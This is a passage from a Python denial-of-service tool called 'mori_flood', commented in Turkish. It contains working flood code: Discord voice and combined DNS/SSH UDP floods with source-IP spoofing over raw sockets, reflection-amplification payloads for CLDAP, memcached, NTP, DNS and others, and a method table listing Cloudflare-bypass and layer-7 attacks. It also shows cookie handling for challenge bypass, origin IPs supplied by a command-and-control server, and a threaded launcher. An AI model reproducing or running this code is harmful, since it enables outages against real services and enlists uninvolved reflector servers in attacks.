*_): """Discord Voice/RTP — root varsa spoofed raw UDP, yoksa normal UDP fallback""" try: ip=socket.gethostbyname(host) except: ip=host # Discord RTP/RTCP payloadları def mk_pl(): return random.choice([ b'\x80\x78' + struct.pack('!H',rint(0,65535)) + os.urandom(4) + os.urandom(4) + os.urandom(rint(8,512)), b'\x13\x37\xca\xfe\x01\x00\x00\x00\x13\x37\xca\xfe\x01\x00\x00\x00' + os.urandom(rint(4,512)), b'\x00\x01\x00\x70' + b'\x21\x12\xa4\x42' + os.urandom(108), # STUN b'\x80\x63' + struct.pack('!H',rint(0,65535)) + os.urandom(rint(32,512)), # RTCP os.urandom(rint(512,1024)), ]) # root varsa: IP spoof ile raw has_root = (os.name != 'nt' and os.geteuid() == 0) if has_root: try: s=socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_UDP) s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) while not _stop.is_set(): pkt=mk_discord(rip(), ip, port) sndto(s, pkt, (ip,port)) close(s); return except: pass # root yok: normal UDP (hızlı, çalışır, IP spoof yok) with suppress(Exception): s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM) while not _stop.is_set(): sndto(s, mk_pl(), (ip,port)) close(s) # ── MEGA_UDP ────────────────────────────────────────────────────────────────── # DNS qtype havuzu — ANY en yıkıcı (resolver tüm kayıt tiplerini arar) _DNS_QTYPES = [0x00FF, 0x0001, 0x001C, 0x000F, 0x0002, 0x0006] # ANY A AAAA MX NS SOA def _mk_dns_query(domain_str): """ Gerçek DNS sorgu paketi + EDNS0 OPT. Random transaction ID + random subdomain → her paket benzersiz → cache miss garantili. EDNS0 UDP payload = 4096 → resolver büyük yanıt üretmeye çalışır → daha fazla CPU/IO. qtype=ANY → resolver tüm kayıt tiplerini arar → recursive lookup zinciri. """ sub = rstr(rint(4, 12)) parts = f"{sub}.{domain_str}".split('.') qname = b''.join(bytes([min(len(lbl), 63)]) + lbl.encode('ascii', 'replace')[:63] for lbl in parts if lbl) + b'\x00' return ( os.urandom(2) # transaction ID (random) + b'\x01\x00' # flags: recursion desired + b'\x00\x01' # QDCOUNT = 1 + b'\x00\x00\x00\x00' # ANCOUNT=0, NSCOUNT=0 + b'\x00\x01' # ARCOUNT = 1 (EDNS0 OPT kaydı) + qname + struct.pack('!HH', random.choice(_DNS_QTYPES), 0x0001) # qtype, IN # EDNS0 OPT record — RFC 6891 + b'\x00' # root label + b'\x00\x29' # type = OPT (41) + b'\x10\x00' # class = 4096 (max UDP payload) + b'\x00\x00\x00\x00' # TTL = 0 + b'\x00\x00' # rdlength = 0 ) _SSH_BANNERS = [ b'SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.3\r\n', b'SSH-2.0-OpenSSH_8.9p1 Debian-3~bpo11+1\r\n', b'SSH-2.0-OpenSSH_7.9p1 Raspbian-10+deb10u4\r\n', b'SSH-2.0-PuTTY_Release_0.80\r\n', b'SSH-2.0-libssh_0.10.6\r\n', ] def _mk_ssh_udp(): """ SSH protokol benzeri UDP payload. 3 mod rastgele seçilir: 0 — SSH banner + artık payload → basit bant genişliği tüketimi 1 — SSH2_MSG_KEXINIT (0x14) simülasyonu → IDS/IPS SSH kex parsing overhead 2 — Ham büyük UDP → NIC interrupt flooding, farklı boyutlar (64–1400 B) """ size = random.choice([64, 128, 256, 512, 900, 1400]) m = rint(0, 2) if m == 0: b = random.choice(_SSH_BANNERS) return b + os.urandom(max(0, size - len(b))) if m == 1: return ( struct.pack('!IB', size, rint(4, 16)) # packet_length, padding_length + b'\x14' # SSH2_MSG_KEXINIT + os.urandom(16) # cookie + struct.pack('!I', rint(20, 200)) # kex_algorithms namelist length + os.urandom(size) # random kex data ) return os.urandom(size) def w_MEGA_UDP(host, port, *_): """ MEGA_UDP — Port 53 (DNS) + Port 22 (SSH) çift vektör akıllı UDP flood. Vektör 1 — DNS flood (port 53), varsayılan %70: • Gerçek DNS sorgu formatı: random TxID + random subdomain + EDNS0 OPT • qtype=ANY/A/AAAA/MX/NS/SOA random rotation → cache miss + recursive lookup • UDP payload size = 4096 (EDNS0) → resolver max response size zorlaması → Sunucu CPU + bellek + disk (zone transfer) maksimum yüklenir Vektör 2 — SSH-like UDP flood (port 22), varsayılan %30: • SSH-2.0 banner + SSH2_MSG_KEXINIT yapısı → IDS/firewall SSH decode yükü • 64–1400 byte arası paket boyutu → NIC interrupt yoğunlaştırma → Bant genişliği tüketimi + firewall/IPS state table baskısı Adaptif split: port=53 → %100 DNS | port=22 → %100 SSH | diğer → 70/30 Kaynak port rotasyonu (her 2000 paket): OS'un yeni ephemeral port ataması → sanki farklı kaynaklardan geliyor gibi görünür (firewall tuple tablosunu zorlar) Root varsa: IP spoof ile raw UDP → kaynak IP sahteciliği + amplifikasyon etkisi """ try: ip = socket.gethostbyname(host) except Exception: ip = host domain = host if '.' in host else f"{host}.target" # Port'a göre adaptif split oranı if port == 53: dns_ratio = 10 # %100 DNS elif port == 22: dns_ratio = 0 # %100 SSH else: dns_ratio = 7 # %70 DNS / %30 SSH has_root = (os.name != 'nt' and os.geteuid() == 0) # ── Pool ön üretimi — hot loop'ta sıfır paket oluşturma maliyeti ────────── # DNS: 2000 farklı subdomain + qtype kombinasyonu → cache miss çeşitliliği korunur. # TxID (ilk 2 byte) her göndermede os.urandom(2) ile değiştirilir → tek syscall. # SSH: 500 pre-built payload → cycle() ile dönülür, üretim yok. _DNS_N = 2000 _SSH_N = 500 dns_pool = [bytearray(_mk_dns_query(domain)) for _ in range(_DNS_N)] ssh_pool = [_mk_ssh_udp() for _ in range(_SSH_N)] if has_root: # Root: raw UDP → IP spoof ile kaynak gizleme with suppress(Exception): sr = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_UDP) sr.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) i = 0 while not _stop.is_set(): i += 1 if i % 10 < dns_ratio: buf = dns_pool[i % _DNS_N] buf[0:2] = os.urandom(2) # TxID rotasyonu pld, dport = bytes(buf), 53 else: pld, dport = ssh_pool[i % _SSH_N], 22 sndto(sr, mk_amp(rip(), ip, dport, pld), (ip, dport)) close(sr) return # Root yok: normal SOCK_DGRAM — pool ile yüksek PPS with suppress(Exception): s53 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s22 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) i = 0 while not _stop.is_set(): i += 1 if i % 10 < dns_ratio: buf = dns_pool[i % _DNS_N] buf[0:2] = os.urandom(2) # TxID rotasyonu — tek syscall sndto(s53, bytes(buf), (ip, 53)) else: sndto(s22, ssh_pool[i % _SSH_N], (ip, 22)) # Kaynak port rotasyonu: her 3000 pakette yeni ephemeral port if i % 3000 == 0: with suppress(Exception): s53.close(); s22.close() s53 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s22 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) close(s53); close(s22) # ── AMP reflection ───────────────────────────────────────────────────────────── AMP_PAYLOADS = { 'RDP': (b'\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00', 3389), 'CLDAP': (b'\x30\x25\x02\x01\x01\x63\x20\x04\x00\x0a\x01\x00\x0a\x01\x00\x02\x01' b'\x00\x02\x01\x00\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65\x63\x74\x63\x6c' b'\x61\x73\x73\x30\x00', 389), 'MEM': (b'\x00\x01\x00\x00\x00\x01\x00\x00gets p h e\n', 11211), 'CHAR': (b'\x01', 19), 'ARD': (b'\x00\x14\x00\x00', 3283), 'NTP': (b'\x17\x00\x03\x2a\x00\x00\x00\x00', 123), 'DNS': (b'\x45\x67\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01\x02\x73\x6c\x00' b'\x00\xff\x00\x01\x00\x00\x29\xff\xff\x00\x00\x00\x00\x00\x00', 53), } def w_AMP(target_ip, amp_payload, amp_port, refs): with suppress(Exception): s=socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_UDP) s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) pool=cycle(refs) while not _stop.is_set(): ref=next(pool) sndto(s, mk_amp(target_ip, ref, amp_port, amp_payload), (ref,amp_port)) close(s) # ── tablo ────────────────────────────────────────────────────────────────────── L7 = { 'GET':w_GET, 'POST':w_POST, 'HEAD':w_HEAD, 'PPS':w_PPS, 'NULL':w_NULL, 'OVH':w_OVH, 'STRESS':w_STRESS, 'COOKIES':w_COOKIES, 'APACHE':w_APACHE, 'XMLRPC':w_XMLRPC, 'DYN':w_DYN, 'GSB':w_GSB, 'RHEX':w_RHEX, 'STOMP':w_STOMP, 'BOT':w_BOT, 'SLOW':w_SLOW, 'AVB':w_AVB, 'CFB':w_CFB, 'BYPASS':w_BYPASS, 'EVEN':w_EVEN, 'DOWNLOADER':w_DOWNLOADER, 'STATICHTTP':w_STATICHTTP, 'UAM_BYPASS':w_UAM_BYPASS, 'CF_BYPASS':w_CF_BYPASS, 'RAPID_RESET':w_RAPID_RESET, 'TLS_SPOOF':w_TLS_SPOOF, 'KILLER':w_KILLER, 'WEBSOCKET_KILLER':w_WEBSOCKET_KILLER, 'NGINX_KILLER':w_NGINX_KILLER, 'WORDPRESS_KILLER':w_WORDPRESS_KILLER, 'CF_UAM_BOT_BYPASS':w_CF_UAM_BOT_BYPASS, } L4 = { 'UDP':w_UDP, 'TCP':w_TCP, 'SYN':w_SYN, 'ICMP':w_ICMP, 'CPS':w_CPS, 'CONNECTION':w_CONNECTION, 'VSE':w_VSE, 'TS3':w_TS3, 'MCPE':w_MCPE, 'FIVEM':w_FIVEM, 'DISCORD':w_DISCORD, 'MEGA_UDP':w_MEGA_UDP, } # ── başlatıcı ────────────────────────────────────────────────────────────────── def launch(fn, args, n): active=[] while not _stop.is_set(): active=[t for t in active if t.is_alive()] while len(active)5 else '_' refs = [r.strip() for r in refs_raw.split(',') if r.strip() and r.strip()!='_'] max_cpu = arg(6, 80, minval=10) # < 10 ise 80 kullan max_ram = arg(7, 75, minval=10) # < 10 ise 75 kullan rpc = arg(8, 10, minval=1) # UAM_BYPASS: argv[9] = base64-encoded cookie string (JSON or plain text) if method == 'UAM_BYPASS' and len(sys.argv) > 9: global _UAM_COOKIE_STR import base64, json as _json try: raw = sys.argv[9].replace('-', '+').replace('_', '/') pad = (4 - len(raw) % 4) % 4 decoded = base64.b64decode(raw + '=' * pad).decode('utf-8', errors='ignore').strip() parts_ck = [] # Format 1: JSON array [{name, value}, ...] # Format 2: JSON dict {name: value, ...} # Format 3: Plain text "cf_clearance=abc; _ga=xxx" (semicolon separated) # Format 4: Plain text "cf_clearance=abc\n_ga=xxx" (newline separated) if decoded.startswith('[') or decoded.startswith('{'): parsed = _json.loads(decoded) if isinstance(parsed, list): parts_ck = [f"{c['name']}={c['value']}" for c in parsed if 'name' in c and 'value' in c] elif isinstance(parsed, dict): parts_ck = [f"{k}={v}" for k, v in parsed.items()] else: # Plain text: split on semicolons or newlines, keep name=value pairs for part in decoded.replace('\n', ';').split(';'): part = part.strip() if '=' in part: parts_ck.append(part) _UAM_COOKIE_STR = '; '.join(parts_ck) print(f"[UAM] {len(parts_ck)} cookie yüklendi: {', '.join(p.split('=')[0] for p in parts_ck)}", flush=True) except Exception as e: print(f"[WARN] Cookie parse hatası: {e}", flush=True) # UAM_BYPASS: argv[10] = base64-encoded JSON array of origin IPs (C2 sunucusu tarafından keşfedildi) if method == 'UAM_BYPASS' and len(sys.argv) > 10: global _UAM_ORIGIN_IPS import base64 as _b64, json as _json2 try: raw10 = sys.argv[10].replace('-', '+').replace('_', '/') pad10 = (4 - len(raw10) % 4) % 4 _UAM_ORIGIN_IPS = _json2.loads(_b64.b64decode(raw10 + '=' * pad10).decode()) print(f"[UAM] C2'den {len(_UAM_ORIGIN_IPS)} origin IP alındı: {', '.join(_UAM_ORIGIN_IPS)}", flush=True) except Exception as e: print(f"[WARN] Origin IP parse hatası: {e}", flush=True) is_l7 = method in L7 is_l4 = method in L4 is_amp = method in AMP_PAYLOADS if not is_l7 and not is_l4 and not is_amp: print(f"\033[91m[HATA] Bilinmeyen metot: {method}\033[0m") print("L7 :", ' '.join(sorted(L7))) print("L4 :", ' '.join(sorted(L4))) print("AMP:", ' '.join(sorted(AMP_PAYLOADS))) sys.exit(1) has_root = (os.name != 'nt' and os.geteuid() == 0) if is_amp and not has_root: print(f"\033[91m[HATA] AMP ({method}) root gerektirir → sudo python3 ...\033[0m") sys.exit(1) if method in ('SYN','ICMP','DISCORD') and not has_root: print(f"\033[93m[INFO] {method}: root yok → UDP/TCP fallback ile çalışacak\033[0m") # hedef parse if is_l7: tgt = Target(target_raw) host, port = tgt.host, tgt.port label = f"{tgt.scheme}://{tgt.auth}{tgt.path}" else: if '://' in target_raw: u=urlparse(target_raw); host,port=u.hostname, u.port or 80 elif ':' in target_raw: host,port=target_raw.rsplit(':',1); port=int(port) else: host,port=target_raw,80 tgt=None; label=f"{host}:{port}" # başlık bar="═"*60 print(f"\033[96m{bar}") print(f" mori_flood — {method} → {label}") print(f" Threads={threads} | Duration={duration}s | RPC={rpc}") print(f" CPU<{max_cpu}% RAM<{max_ram}%") if HAS_IMP: print(" [+] impacket (raw packet support)") if HAS_CS: print(" [+] cloudscraper (CF bypass)") if HAS_REQ: print(" [+] requests (session bypass)") print(" [+] CF_BYPASS/TLS_SPOOF: stdlib ssl (cipher spoof) + CF V2/V3 challenge solver") print(f"{bar}\033[0m", flush=True) # watchdog başlat Thread(target=guard, args=(max_cpu,max_ram), daemon=True).start() # zamanlayıcı def stopper(): time.sleep(duration); _stop.set() print(f"\n\033[92m[BİTTİ] {duration}s | {SENT[0]:,} paket | {BYTES[0]/1024/1024:.1f} MB\033[0m", flush=True) Thread(target=stopper, daemon=True).start() # durum çıktısı def status(): t0=time.time() while not _stop.is_set(): time.sleep(5) el=time.time()-t0 pps=SENT[0]/el if el>0 else 0 mbps=BYTES[0]/el/1024/1024*8 if el>0 else 0 print(f"\033[33m[STAT] {SENT[0]:,} paket | {pps:.0f} pps | {mbps:.1f} Mbps | CPU={cpu():.0f}% RAM={ram():.0f}%\033[0m", flush=True) Thread(target=status, daemon=True).start() # çalıştır try: if is_l7: fn=L7[method] launch(fn, (tgt, rpc), threads) elif is_amp: if not refs: print("\033[91m[HATA] AMP için reflector gerekli: python3 mori_flood.py ... 8.8.8.8,8.8.4.4\033[0m") sys.exit(1) try: tip=socket.gethostbyname(host) except: tip=host ap,aprt=AMP_PAYLOADS[method] launch(w_AMP, (tip,ap,aprt,refs), threads) else: fn=L4[method] launch(fn, (host,port), threads) except KeyboardInterrupt: _stop.set() while not _stop.is_set(): time.sleep(0.1) time.sleep(0.3) print(f"\033[96m[SON] Gönderilen={SENT[0]:,} | Bytes={BYTES[0]:,}\033[0m", flush=True) if __name__=='__main__': main()